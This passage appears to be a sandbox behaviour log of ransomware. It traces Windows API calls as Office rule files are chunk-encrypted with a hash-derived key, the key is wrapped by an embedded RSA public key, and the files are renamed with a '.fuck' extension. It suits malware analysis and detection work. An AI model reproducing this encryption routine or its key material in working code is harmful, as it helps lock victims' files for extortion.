pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.772] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.772] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.772] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.772] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.772] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.772] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.772] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.772] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.772] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.772] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.772] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.772] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.772] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.773] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.773] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.773] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.773] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.773] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.773] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.773] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.773] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.773] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.773] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.773] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.773] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.773] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.774] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.774] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.774] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.774] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.774] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.774] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.774] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.774] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.774] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.774] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.774] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.774] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.774] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.774] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.775] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.775] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.775] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.775] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.775] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.775] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.775] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.775] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.775] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.775] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.775] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.775] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.775] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.775] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.776] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.776] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.776] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.776] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.776] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.776] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.776] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.776] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.776] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.776] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.776] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x24c, lpOverlapped=0x0) returned 1 [0269.776] CryptEncrypt (in: hKey=0x2fa6c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x24c, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x250) returned 1 [0269.776] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x250, lpOverlapped=0x0) returned 1 [0269.776] CloseHandle (hObject=0x5d48) returned 1 [0269.777] CloseHandle (hObject=0x5d3c) returned 1 [0269.777] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winproj.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\winproj.exe_rules.xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winproj.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\winproj.exe_rules.xml"), bFailIfExists=0) returned 1 [0269.784] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winproj.exe_Rules.xml", dwFileAttributes=0x0) returned 1 [0269.784] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winproj.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\winproj.exe_rules.xml.gsg")) returned 1 [0269.786] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winproj.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\winproj.exe_rules.xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winproj.exe_Rules.xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\winproj.exe_rules.xml.fuck")) returned 1 [0269.788] CryptDestroyHash (hHash=0x2fa5c8) returned 1 [0269.788] CryptDestroyKey (hKey=0x2fa6c8) returned 1 [0269.788] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0269.788] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0269.788] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0269.788] GetLastError () returned 0x0 [0269.788] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\winword.exe_rules.xml")) returned 0x20 [0269.788] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml", dwFileAttributes=0x80) returned 1 [0269.789] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\winword.exe_rules.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0269.790] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\winword.exe_rules.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0269.791] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml.gsg", dwFileAttributes=0x2) returned 1 [0269.791] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0269.793] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0269.793] lstrlenA (lpString="lmouxGpZErYqCdPYwMrzoSBazMlQm") returned 29 [0269.793] CryptHashData (hHash=0x2fa3c8, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0269.793] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa3c8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa508) returned 1 [0269.794] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0269.794] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0269.794] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f27110) returned 1 [0269.794] CryptImportPublicKeyInfo (in: hCryptProv=0x2f27110, dwCertEncodingType=0x1, pInfo=0x2f32c50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f32c80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f32c88*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa548) returned 1 [0269.794] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0269.794] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f275d8*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f275d8*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0269.794] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f275d8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f275d8*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0269.795] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.813] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.813] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.827] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.828] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.828] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.828] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.829] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.829] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.829] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.829] 